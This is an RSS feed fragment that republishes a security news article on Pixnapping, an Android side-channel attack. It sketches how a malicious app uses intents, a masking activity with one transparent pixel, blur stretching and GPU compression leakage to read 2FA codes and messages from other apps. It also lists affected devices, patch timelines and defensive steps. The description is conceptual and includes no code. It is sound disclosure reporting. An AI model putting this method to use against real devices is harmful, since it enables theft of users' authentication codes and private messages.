Claims Red Hat GitLab Breach, 570GB Data Stolen" height="150" width="300" loading="lazy" decoding="async"></a><h3 class="rpwe-title"><a href="https://www.blackhatethicalhacking.com/news/crimson-collective-claims-red-hat-gitlab-breach-570gb-data-stolen/" target="_self">Crimson Collective Claims Red Hat GitLab Breach, 570GB Data Stolen</a></h3><time class="rpwe-time published" datetime="2025-10-02T10:53:22+02:00">October 2, 2025</time><div class="rpwe-summary"></div></li></ul></div><!-- Generated by http://wordpress.org/plugins/recent-posts-widget-extended/ --></div><div class="et_pb_widget widget_block"><h3>EXPLORE OUR STORE</h3></div><div class="et_pb_widget widget_media_image"><a href="https://store.blackhatethicalhacking.com/"><img decoding="async" width="233" height="300" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2024/09/Tshirt-233x300.png" class="image wp-image-280999  attachment-medium size-medium" alt=""></a></div><div class="et_pb_widget widget_media_image"><a href="https://store.blackhatethicalhacking.com/"><img decoding="async" width="300" height="280" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2024/09/RedTeamers-e1725807706904-300x280.png" class="image wp-image-281001  attachment-medium size-medium" alt=""></a></div><div class="et_pb_widget widget_media_image"><a href="https://store.blackhatethicalhacking.com/"><img decoding="async" width="711" height="1024" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2024/09/Hoodie-711x1024.png" class="image wp-image-281002  attachment-large size-large" alt=""></a></div><div class="widget_text et_pb_widget widget_custom_html"><div class="textwidget custom-html-widget"> <!-- News Adsense Adcode --> <ins class="adsbygoogle" data-ad-client="ca-pub-6620833063853657" data-ad-slot="8337846400" data-ad-format="auto" data-full-width-responsive="true"></ins> </div></div>
			</div><div class="et_pb_module et_pb_sidebar_1 news-sidebar2 et_animated et_pb_widget_area clearfix et_pb_widget_area_left  et_pb_text_align_justified et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_widget widget_block"><a href="https://www.blackhatethicalhacking.com/courses/"><img decoding="async" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2022/06/OffSec-Course.png"></a>
<h3>Offensive Security &amp; Ethical Hacking Course</h3>
<p>Begin the learning curve of hacking now!</p>
</div><div class="et_pb_widget widget_block"><hr>
<a href="https://www.blackhatethicalhacking.com/solutions/"><img decoding="async" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2023/03/Solutions.png"></a>
<h3>Information Security Solutions</h3>
<p>Find out how Pentesting Services can help you.</p></div><div class="et_pb_widget widget_block"><hr>
<a href="https://discord.gg/EYMqveWXkv"><img decoding="async" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2023/10/Discord.png"></a>
<h3>Join our Community</h3></div>
			</div>
			</div>
				</div>
				
			</div>The post <a href="https://www.blackhatethicalhacking.com/news/linkpro-rootkit-new-ebpf-backed-gnu-linux-backdoor-found-in-compromised-aws-environments/">LinkPro Rootkit: New eBPF-Backed GNU/Linux Backdoor Found in Compromised AWS Environments</a> first appeared on <a href="https://www.blackhatethicalhacking.com/">Black Hat Ethical Hacking</a>.]]></content:encoded>
</item>
<item>
<title><![CDATA[Pixnapping: New Android Side-Channel Steals 2FA Codes Pixel-by-Pixel]]></title>
<description><![CDATA[Pixnapping: New Android Side-Channel Steals 2FA Codes Pixel-by-Pixel
				
				
			
			
				
				
				
				
			
				
				
				
				
				
				
				
				
				
				
				
				 Post Views: 2
			
			
				
				
				
				
				



			
			
				
				
				
				
			
				
				
				
				
				
				
				
				
		...]]></description>
<link>https://tsecurity.de/de/3041387/it-security-nachrichten/pixnapping-new-android-side-channel-steals-2fa-codes-pixel-by-pixel/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3041387/it-security-nachrichten/pixnapping-new-android-side-channel-steals-2fa-codes-pixel-by-pixel/</guid>
<pubDate>Wed, 15 Oct 2025 10:50:01 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="et_pb_section et_pb_section_0 et_section_specialty">
				
				
				
				
				
				<div class="et_pb_row">
				<div class="et_pb_column et_pb_column_3_4 et_pb_column_0   et_pb_specialty_column  et_pb_css_mix_blend_mode_passthrough">
				
				
				
				
				<div class="et_pb_row_inner et_pb_row_inner_0">
				<div class="et_pb_column et_pb_column_4_4 et_pb_column_inner et_pb_column_inner_0 et-last-child">
				
				
				
				
				<div class="et_pb_module et_pb_post_title et_pb_post_title_0 et_pb_bg_layout_light  et_pb_text_align_left">
				
				
				
				
				
				<div class="et_pb_title_container">
					<h1 class="entry-title">Pixnapping: New Android Side-Channel Steals 2FA Codes Pixel-by-Pixel</h1>
				</div>
				
			</div>
			</div>
				
				
				
				
			</div><div class="et_pb_row_inner et_pb_row_inner_1">
				<div class="et_pb_column et_pb_column_4_4 et_pb_column_inner et_pb_column_inner_1 et-last-child">
				
				
				
				
				<div class="et_pb_module et_pb_text et_pb_text_0  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><p><strong><div class="post-views content-post post-286524 entry-meta load-static">
				<span class="post-views-icon dashicons dashicons-chart-bar"></span> <span class="post-views-label">Post Views:</span> <span class="post-views-count">2</span>
			</div></strong></p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_1  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><br>
<!-- News_Horizontal_smaller --><br>
<ins class="adsbygoogle" data-ad-client="ca-pub-6620833063853657" data-ad-slot="8337846400"></ins><br>
</div>
			</div>
			</div>
				
				
				
				
			</div><div class="et_pb_row_inner et_pb_row_inner_2 patreon-row">
				<div class="et_pb_column et_pb_column_4_4 et_pb_column_inner et_pb_column_inner_2 et-last-child">
				
				
				
				
				<div class="et_pb_module et_pb_text et_pb_text_2  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><h3 class="premium-content">Join our <a class="green_color" href="https://www.patreon.com/posts/maximizing-your-87671900" target="_blank" rel="noopener sponsored">Patreon</a> Channel and Gain access to 70+ Exclusive Walkthrough Videos.</h3></div>
			</div><div class="et_pb_module et_pb_image et_pb_image_0">
				
				
				
				
				<a href="https://www.patreon.com/posts/create-evasive-111421720" target="_blank"><span class="et_pb_image_wrap "><img fetchpriority="high" decoding="async" width="800" height="120" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2025/02/Patreon-2.png" alt="Patreon" title="Patreon" srcset="https://www.blackhatethicalhacking.com/wp-content/uploads/2025/02/Patreon-2.png 800w, https://www.blackhatethicalhacking.com/wp-content/uploads/2025/02/Patreon-2-480x72.png 480w" sizes="(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) 800px, 100vw" class="wp-image-282931"></span></a>
			</div><div class="et_pb_module et_pb_divider et_pb_divider_0 et_pb_divider_position_ et_pb_space"><div class="et_pb_divider_internal"></div></div>
			</div>
				
				
				
				
			</div><div class="et_pb_row_inner et_pb_row_inner_3">
				<div class="et_pb_column et_pb_column_4_4 et_pb_column_inner et_pb_column_inner_3 et-last-child">
				
				
				
				
				<div class="et_pb_module et_pb_text et_pb_text_3  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner">Reading Time: 3 Minutes</div>
			</div>
			</div>
				
				
				
				
			</div><div class="et_pb_row_inner et_pb_row_inner_4">
				<div class="et_pb_column et_pb_column_4_4 et_pb_column_inner et_pb_column_inner_4 et-last-child">
				
				
				
				
				<div class="et_pb_module et_pb_text et_pb_text_4  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><h2 data-start="546" data-end="569"><strong>What Pixnapping does</strong></h2>
<p data-start="571" data-end="1114">A team of U.S. university researchers has <a href="https://www.pixnapping.com/" target="_blank" rel="noopener">disclosed</a> <strong data-start="623" data-end="637">Pixnapping</strong>, a novel side-channel attack that allows a malicious Android app with <strong data-start="708" data-end="734">no special permissions</strong> to steal the <em data-start="748" data-end="763">actual pixels</em> other apps draw on screen, reconstruct those pixels, and recover sensitive content — including two-factor authentication (2FA) codes, chat messages, emails and even crypto seed phrases. The attack works on fully patched modern Android phones and can recover a 2FA code in under 30 seconds in optimized scenarios.</p>
<hr data-start="1116" data-end="1119">
<h2 data-start="1121" data-end="1202"><strong>How the attack works — pixel isolation, blur stretching, and GPU side channels</strong></h2>
<p data-start="1204" data-end="1265">Pixnapping chains several graphics and OS behaviors together:</p>
<ul>
<li data-start="1269" data-end="1498">The malicious app uses Android <strong data-start="1300" data-end="1311">intents</strong> to launch or bring a target app/window into the composition pipeline so the target’s pixels are present in SurfaceFlinger (the system compositor).</li>
<li data-start="1501" data-end="1851">It then displays a carefully crafted <strong data-start="1538" data-end="1569">foreground masking activity</strong> that is opaque white except for one tiny transparent pixel at an attacker-chosen location. By repeatedly changing that transparent pixel and performing GPU operations, the attacker can test whether the underlying pixel is white or non-white.</li>
<li data-start="1854" data-end="2180">The exploit leverages a quirk in <strong data-start="1887" data-end="1929">SurfaceFlinger’s blur/stretch behavior</strong> to enlarge the sampled pixel so it produces measurable side effects. Combined with optimizations, the researchers recover characters by stitching many sampled pixels together and applying OCR-style recognition.</li>
<li data-start="2183" data-end="2401">Crucially, Pixnapping reuses the <strong data-start="2216" data-end="2227">GPU.zip</strong> style-channel technique (which abuses GPU data-compression/processing artifacts) to leak visual information from the graphics pipeline.</li>
</ul>
<p><img decoding="async" class="aligncenter" src="https://www.bleepstatic.com/images/news/u/1220909/2025/October/blur.jpg" alt="Blurred region stretched to fill a larger patch" width="519" height="326"><strong>Blurred 1×1 sub-region stretched into a larger colored patch</strong><br><em>Source: pixnapping.com</em></p>
<hr data-start="2403" data-end="2406">
<h2 data-start="2408" data-end="2445"><strong>Affected devices and success rates</strong></h2>
<p data-start="2447" data-end="2941">Researchers demonstrated Pixnapping on a range of mainstream devices — <strong data-start="2518" data-end="2565">Google Pixel 6/7/8/9 and Samsung Galaxy S25</strong> — across Android <strong data-start="2583" data-end="2592">13–16</strong>, and concluded the core mechanisms making the attack viable exist on many Android implementations, so older devices may also be vulnerable. While the raw pixel leakage rate is modest (roughly <strong data-start="2785" data-end="2810">0.6–2.1 pixels/second</strong>), engineering improvements let the team extract short numeric 2FA codes in under 30 seconds.</p>
<p><span class="gsCBk5jiaPQWKJEhx3zvLDo6fpITwH8yYudAm14eG9RXrSn2ZFlNV0Mt7bc"></span></p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_5 see-also-text  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><strong>See Also: So, you want to be a hacker?<br>
</strong><strong><a href="https://www.blackhatethicalhacking.com/courses/" target="_blank" rel="noopener noreferrer">Offensive Security, Bug Bounty Courses</a></strong></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_6  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><br>
<!-- News_Horizontal_smaller --><br>
<ins class="adsbygoogle" data-ad-client="ca-pub-6620833063853657" data-ad-slot="8337846400"></ins><br>
</div>
			</div><div class="et_pb_module et_pb_text et_pb_text_7  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><h4><span><strong>Discover your weakest link. Be proactive, not reactive. Cybercriminals need just one flaw to strike.</strong></span></h4>
<p><a href="https://www.blackhatethicalhacking.com/solutions/"><img decoding="async" class="alignnone wp-image-276050 size-full" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2023/11/Solutions.png" alt="" width="800" height="120" srcset="https://www.blackhatethicalhacking.com/wp-content/uploads/2023/11/Solutions.png 800w, https://www.blackhatethicalhacking.com/wp-content/uploads/2023/11/Solutions-480x72.png 480w" sizes="(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) 800px, 100vw"></a></p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_8  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><h2 data-start="2948" data-end="2992"><strong>Timeline: patch attempts and ongoing work</strong></h2>
<p data-start="2994" data-end="3522">Google shipped a mitigation in the <strong data-start="3029" data-end="3047">September 2025</strong> Android security bulletin addressing the underlying information-disclosure behavior (CVE-2025-48561), but researchers produced an updated bypass that forced Google to prepare a more comprehensive fix slated for the <strong data-start="3263" data-end="3280">December 2025</strong> Android security update. Google and Samsung have committed to follow-up fixes; however, GPU vendors have not announced independent patches for the GPU-side compression channel used by GPU.zip/Pixnapping.</p>
<hr data-start="3524" data-end="3527">
<h2 data-start="3529" data-end="3557"><strong>Real-world risk and scope</strong></h2>
<p data-start="3559" data-end="4217">The research team scanned nearly 100,000 Play Store apps and found hundreds of thousands of invocable intent actions, implying Pixnapping’s attack surface is broad because many apps (and webpages) can be launched via intents. That said, the exploit requires tailored tuning for a target device, so while successful demonstrations are impactful, opportunistic mass exploitation is harder — and researchers reported <strong data-start="3973" data-end="4005">no confirmed Play Store apps</strong> using Pixnapping at the time of disclosure. Nonetheless, the ubiquity of exposed vectors and over-the-air distribution of apps makes rapid weaponization a realistic concern. </p>
<hr data-start="4219" data-end="4222">
<h2 data-start="4224" data-end="4281"><strong>Examples of what can be stolen (research measurements)</strong></h2>
<p data-start="4283" data-end="4427">The paper and accompanying tests include long-running recovery estimates for large visual regions; examples reported by the researchers include:</p>
<ul>
<li data-start="4431" data-end="4606"><strong data-start="4431" data-end="4463">Google Maps timeline entries</strong> — large pixel regions (tens of thousands of pixels) — full recovery unoptimized would take many hours.</li>
<li data-start="4609" data-end="4746"><strong data-start="4609" data-end="4641">Venmo account-balance panels</strong> — thousands of pixels, multi-hour recovery without optimization. </li>
<li data-start="4749" data-end="5068"><strong data-start="4749" data-end="4784">SMS / Messages and Signal chats</strong> — larger chat windows measured in tens of thousands of pixels; Signal chat recovery worked even with Signal’s Screen Security enabled (but larger areas take longer). For targeted short strings like 2FA codes, optimized attacks are fast (&lt;30s). </li>
</ul>
<hr data-start="5070" data-end="5073">
<h2 data-start="5075" data-end="5100"><strong>What vendors have said</strong></h2>
<p data-start="5102" data-end="5572">Google acknowledged the vulnerability class in its September bulletin and issued a first mitigation; after researchers demonstrated a bypass the company told the public it will deliver a more complete mitigant in the December Android security update. Samsung has publicly committed to fixes for affected devices. No GPU vendor has publicly committed to a hardware/firmware mitigation specific to GPU.zip-style compression leakage. </p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_9 see-also-text  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><p><strong>Trending: <a href="https://www.blackhatethicalhacking.com/articles/integrating-metasploit-with-beef-framework-for-advanced-post-exploitation-attacks/" target="_blank" rel="noopener noreferrer">Integrating Metasploit with BeEF Framework for advanced post-exploitation attacks<br>
</a></strong></p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_10  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><br>
<!-- News Adsense Adcode Horizontal --><br>
<ins class="adsbygoogle" data-ad-client="ca-pub-6620833063853657" data-ad-slot="8337846400"></ins><br>
</div>
			</div><div class="et_pb_module et_pb_text et_pb_text_11 see-also-text  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><p><strong>Trending: <a href="https://www.blackhatethicalhacking.com/tools/formpoison/" target="_blank" rel="noopener">Offensive Security Tool: FormPoison</a></strong></p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_12  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><div class="pt-0">
<div class="gizmo-bot-avatar flex h-8 w-8 items-center justify-center overflow-hidden rounded-full">
<div class="relative p-1 rounded-sm flex items-center justify-center bg-token-main-surface-primary text-token-text-primary h-8 w-8">
<div class="flex-shrink-0 flex flex-col relative items-end">
<div class="pt-0">
<div class="gizmo-bot-avatar flex h-8 w-8 items-center justify-center overflow-hidden rounded-full">
<div class="relative p-1 rounded-sm flex items-center justify-center bg-token-main-surface-primary text-token-text-primary h-8 w-8">
<div class="flex-shrink-0 flex flex-col relative items-end">
<div class="pt-0">
<div class="gizmo-bot-avatar flex h-8 w-8 items-center justify-center overflow-hidden rounded-full">
<div class="relative p-1 rounded-sm flex items-center justify-center bg-token-main-surface-primary text-token-text-primary h-8 w-8">
<div class="pt-0">
<div class="gizmo-bot-avatar flex h-8 w-8 items-center justify-center overflow-hidden rounded-full">
<div class="relative p-1 rounded-sm flex items-center justify-center bg-token-main-surface-primary text-token-text-primary h-8 w-8">
<div class="flex-shrink-0 flex flex-col relative items-end">
<div class="pt-0">
<div class="gizmo-bot-avatar flex h-8 w-8 items-center justify-center overflow-hidden rounded-full">
<div class="relative p-1 rounded-sm flex items-center justify-center bg-token-main-surface-primary text-token-text-primary h-8 w-8">
<div class="flex-shrink-0 flex flex-col relative items-end">
<div class="pt-0">
<div class="gizmo-bot-avatar flex h-8 w-8 items-center justify-center overflow-hidden rounded-full">
<div class="relative p-1 rounded-sm flex items-center justify-center bg-token-main-surface-primary text-token-text-primary h-8 w-8">
<h2 data-start="5579" data-end="5624"><strong>Immediate mitigations and defensive advice</strong></h2>
<p data-start="5626" data-end="5793">Until the December Android security update (and vendor patches) are widely available and installed, organizations and users can reduce risk with these practical steps:</p>
<ul>
<li data-start="5797" data-end="5937"><strong data-start="5797" data-end="5861">Treat short numeric authenticator codes as transient secrets</strong> — prefer push-style MFA or hardware tokens (FIDO/WebAuthn) when possible.</li>
<li data-start="5940" data-end="6243"><strong data-start="5940" data-end="5977">Minimize implicit intent surfaces</strong> — apps and developers should avoid exposing sensitive content via implicit intents that launch activities with full content visible without authentication. Mobile app teams should harden activities that render sensitive views so they are not externally invocable.</li>
<li data-start="6246" data-end="6587"><strong data-start="6246" data-end="6271">Harden sensitive apps</strong> — apps displaying secrets (authenticators, wallets, banking) should use platform protections like FLAG_SECURE and review SurfaceFlinger exposure vectors; but note researchers demonstrated recovery even against some screen-protection settings, so multiple layers are needed. </li>
<li data-start="6590" data-end="6764"><strong data-start="6590" data-end="6618">Limit untrusted installs</strong> — avoid sideloading apps, and apply strict enterprise mobile management (EMM) policies that restrict app sources and control inter-app intents.</li>
<li data-start="6767" data-end="7012"><strong data-start="6767" data-end="6785">Patch promptly</strong> — install Android security updates as soon as vendor patches are available. Google’s more complete patch is planned for the December bulletin; install it when your device maker ships it.</li>
</ul>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_13 see-also-text  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><p><strong>Trending: <a href="https://www.blackhatethicalhacking.com/news/redis-fixes-13-year-old-cvss-10-0-redishell-bug-allowing-remote-code-execution/" target="_blank" rel="noopener noreferrer">Redis Fixes 13-Year-Old CVSS 10.0 “RediShell” Bug Allowing Remote Code Execution</a></strong></p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_14  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><blockquote><p><em>Are u a security researcher? Or a company that writes articles about Cyber Security, Offensive Security (related to information security in general) that match with our specific audience and is worth sharing? </em><em>If you want to express your idea in an article contact us here for a quote: <strong>info@blackhatethicalhacking.com</strong></em></p></blockquote></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_15  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><p><strong><em>Source: bleepingcomputer.com</em></strong></p>
<p><a href="https://www.bleepingcomputer.com/news/security/new-android-pixnapping-attack-steals-mfa-codes-pixel-by-pixel/" target="_blank" rel="noopener"><strong>Source Link</strong></a></p></div>
			</div><div class="et_pb_module et_pb_divider et_pb_divider_1 et_pb_divider_position_ et_pb_space"><div class="et_pb_divider_internal"></div></div><div class="et_pb_module et_pb_image et_pb_image_1 store-img">
				
				
				
				
				<a href="https://store.blackhatethicalhacking.com/" target="_blank"><span class="et_pb_image_wrap "><img decoding="async" width="1142" height="500" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2023/03/Store.png" alt="Merch" title="Store" srcset="https://www.blackhatethicalhacking.com/wp-content/uploads/2023/03/Store.png 1142w, https://www.blackhatethicalhacking.com/wp-content/uploads/2023/03/Store-980x429.png 980w, https://www.blackhatethicalhacking.com/wp-content/uploads/2023/03/Store-480x210.png 480w" sizes="(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) and (max-width: 980px) 980px, (min-width: 981px) 1142px, 100vw" class="wp-image-271829"></span></a>
			</div><div class=" et_pb_logo_slider  et_pb_logo_slider_0 ">
                
            </div>
			</div>
				
				
				
				
			</div>
			</div><div class="et_pb_column et_pb_column_1_4 et_pb_column_1    et_pb_css_mix_blend_mode_passthrough">
				
				
				
				
				<div class="et_pb_module et_pb_sidebar_0 news-sidebar1 et_pb_widget_area clearfix et_pb_widget_area_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_widget rpwe_widget recent-posts-extended"><h4 class="widgettitle">Recent News</h4><div class="rpwe-block news-recent-posts-sb"><ul class="rpwe-ul"><li class="rpwe-li rpwe-clearfix"><a class="rpwe-img" href="https://www.blackhatethicalhacking.com/news/chaosbot-rust-backdoor-uses-discord-c2-chaos-ransomware-adds-destructive-clipboard-hijack-features/" target="_self"><img class="rpwe-aligncenter rpwe-thumb" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2025/10/877x440-Images-for-the-News-posts-32-300x150.png" alt="ChaosBot: Rust Backdoor Uses Discord C2 — Chaos Ransomware Adds Destructive &amp; Clipboard-Hijack Features" height="150" width="300" loading="lazy" decoding="async"></a><h3 class="rpwe-title"><a href="https://www.blackhatethicalhacking.com/news/chaosbot-rust-backdoor-uses-discord-c2-chaos-ransomware-adds-destructive-clipboard-hijack-features/" target="_self">ChaosBot: Rust Backdoor Uses Discord C2 — Chaos Ransomware Adds Destructive &amp; Clipboard-Hijack Features</a></h3><time class="rpwe-time published" datetime="2025-10-13T10:26:28+02:00">October 13, 2025</time><div class="rpwe-summary"></div></li><li class="rpwe-li rpwe-clearfix"><a class="rpwe-img" href="https://www.blackhatethicalhacking.com/news/redis-fixes-13-year-old-cvss-10-0-redishell-bug-allowing-remote-code-execution/" target="_self"><img class="rpwe-aligncenter rpwe-thumb" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2025/10/877x440-Images-for-the-News-posts-31-300x150.png" alt="Redis Fixes 13-Year-Old CVSS 10.0 “RediShell” Bug Allowing Remote Code Execution" height="150" width="300" loading="lazy" decoding="async"></a><h3 class="rpwe-title"><a href="https://www.blackhatethicalhacking.com/news/redis-fixes-13-year-old-cvss-10-0-redishell-bug-allowing-remote-code-execution/" target="_self">Redis Fixes 13-Year-Old CVSS 10.0 “RediShell” Bug Allowing Remote Code Execution</a></h3><time class="rpwe-time published" datetime="2025-10-07T11:48:42+02:00">October 7, 2025</time><div class="rpwe-summary"></div></li><li class="rpwe-li rpwe-clearfix"><a class="rpwe-img" href="https://www.blackhatethicalhacking.com/news/crimson-collective-claims-red-hat-gitlab-breach-570gb-data-stolen/" target="_self"><img class="rpwe-aligncenter rpwe-thumb" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2025/10/877x440-Images-for-the-News-posts-29-300x150.png" alt="Crimson Collective Claims Red Hat GitLab Breach, 570GB Data Stolen" height="150" width="300" loading="lazy" decoding="async"></a><h3 class="rpwe-title"><a href="https://www.blackhatethicalhacking.com/news/crimson-collective-claims-red-hat-gitlab-breach-570gb-data-stolen/" target="_self">Crimson Collective Claims Red Hat GitLab Breach, 570GB Data Stolen</a></h3><time class="rpwe-time published" datetime="2025-10-02T10:53:22+02:00">October 2, 2025</time><div class="rpwe-summary"></div></li><li class="rpwe-li rpwe-clearfix"><a class="rpwe-img" href="https://www.blackhatethicalhacking.com/news/cisa-adds-critical-sudo-chroot-flaw-to-kev/" target="_self"><img class="rpwe-aligncenter rpwe-thumb" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2025/09/877x440-Images-for-the-News-posts-27-300x150.png" alt="CISA Adds Critical Sudo “chroot” Flaw to KEV" height="150" width="300" loading="lazy" decoding="async"></a><h3 class="rpwe-title"><a href="https://www.blackhatethicalhacking.com/news/cisa-adds-critical-sudo-chroot-flaw-to-kev/" target="_self">CISA Adds Critical Sudo “chroot” Flaw to KEV</a></h3><time class="rpwe-time published" datetime="2025-09-30T09:10:07+02:00">September 30, 2025</time><div class="rpwe-summary"></div></li></ul></div><!-- Generated by http://wordpress.org/plugins/recent-posts-widget-extended/ --></div><div class="et_pb_widget widget_block"><h3>EXPLORE OUR STORE</h3></div><div class="et_pb_widget widget_media_image"><a href="https://store.blackhatethicalhacking.com/"><img decoding="async" width="233" height="300" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2024/09/Tshirt-233x300.png" class="image wp-image-280999  attachment-medium size-medium" alt=""></a></div><div class="et_pb_widget widget_media_image"><a href="https://store.blackhatethicalhacking.com/"><img decoding="async" width="300" height="280" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2024/09/RedTeamers-e1725807706904-300x280.png" class="image wp-image-281001  attachment-medium size-medium" alt=""></a></div><div class="et_pb_widget widget_media_image"><a href="https://store.blackhatethicalhacking.com/"><img decoding="async" width="711" height="1024" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2024/09/Hoodie-711x1024.png" class="image wp-image-281002  attachment-large size-large" alt=""></a></div><div class="widget_text et_pb_widget widget_custom_html"><div class="textwidget custom-html-widget"> <!-- News Adsense Adcode --> <ins class="adsbygoogle" data-ad-client="ca-pub-6620833063853657" data-ad-slot="8337846400" data-ad-format="auto" data-full-width-responsive="true"></ins> </div></div>
			</div><div class="et_pb_module et_pb_sidebar_1 news-sidebar2 et_animated et_pb_widget_area clearfix et_pb_widget_area_left  et_pb_text_align_justified et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_widget widget_block"><a href="https://www.blackhatethicalhacking.com/courses/"><img decoding="async" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2022/06/OffSec-Course.png"></a>
<h3>Offensive Security &amp; Ethical Hacking Course</h3>
<p>Begin the learning curve of hacking now!</p>
</div><div class="et_pb_widget widget_block"><hr>
<a href="https://www.blackhatethicalhacking.com/solutions/"><img decoding="async" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2023/03/Solutions.png"></a>
<h3>Information Security Solutions</h3>
<p>Find out how Pentesting Services can help you.</p></div><div class="et_pb_widget widget_block"><hr>
<a href="https://discord.gg/EYMqveWXkv"><img decoding="async" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2023/10/Discord.png"></a>
<h3>Join our Community</h3></div>
			</div>
			</div>
				</div>
				
			</div>The post <a href="https://www.blackhatethicalhacking.com/news/pixnapping-new-android-side-channel-steals-2fa-codes-pixel-by-pixel/">Pixnapping: New Android Side-Channel Steals 2FA Codes Pixel-by-Pixel</a> first appeared on <a href="https://www.blackhatethicalhacking.com/">Black Hat Ethical Hacking</a>.]]></content:encoded>
</item>
<item>
<title><![CDATA[ChaosBot: Rust Backdoor Uses Discord C2 — Chaos Ransomware Adds Destructive & Clipboard-Hijack Features]]></title>
<description><![CDATA[ChaosBot: Rust Backdoor Uses Discord C2 — Chaos Ransomware Adds Destructive & Clipboard-Hijack Features
				
				
			
			
				
				
				
				
			
				
				
				
				
				
				
				
				
				
				
				
				 Post Views: 46
			
			
				
				
				
				
				



			
			
				
				
				
				
			
				
	...]]></description>
<link>https://tsecurity.de/de/3036669/it-security-nachrichten/chaosbot-rust-backdoor-uses-discord-c2-chaos-ransomware-adds-destructive-clipboard-hijack-features/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3036669/it-security-nachrichten/chaosbot-rust-backdoor-uses-discord-c2-chaos-ransomware-adds-destructive-clipboard-hijack-features/</guid>
<pubDate>Mon, 13 Oct 2025 10:34:27 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="et_pb_section et_pb_section_0 et_section_specialty">
				
				
				
				
				
				<div class="et_pb_row">
				<div class="et_pb_column et_pb_column_3_4 et_pb_column_0   et_pb_specialty_column  et_pb_css_mix_blend_mode_passthrough">
				
				
				
				
				<div class="et_pb_row_inner et_pb_row_inner_0">
				<div class="et_pb_column et_pb_column_4_4 et_pb_column_inner et_pb_column_inner_0 et-last-child">
				
				
				
				
				<div class="et_pb_module et_pb_post_title et_pb_post_title_0 et_pb_bg_layout_light  et_pb_text_align_left">
				
				
				
				
				
				<div class="et_pb_title_container">
					<h1 class="entry-title">ChaosBot: Rust Backdoor Uses Discord C2 — Chaos Ransomware Adds Destructive &amp; Clipboard-Hijack Features</h1>
				</div>
				
			</div>
			</div>
				
				
				
				
			</div><div class="et_pb_row_inner et_pb_row_inner_1">
				<div class="et_pb_column et_pb_column_4_4 et_pb_column_inner et_pb_column_inner_1 et-last-child">
				
				
				
				
				<div class="et_pb_module et_pb_text et_pb_text_0  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><p><strong><div class="post-views content-post post-286515 entry-meta load-static">
				<span class="post-views-icon dashicons dashicons-chart-bar"></span> <span class="post-views-label">Post Views:</span> <span class="post-views-count">46</span>
			</div></strong></p></div>
			</div><div class="et_pb_module et_pb_text et_pb_text_1  et_pb_text_align_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_text_inner"><br>
<!-- News_Horizontal_smaller --><br>
<ins class="adsbygoogle" data-ad-client="ca-pub-6620833063853657" data-ad-slot="8337846400"></ins><br>
</div>
			</div>
			</div>
				
				
				
				
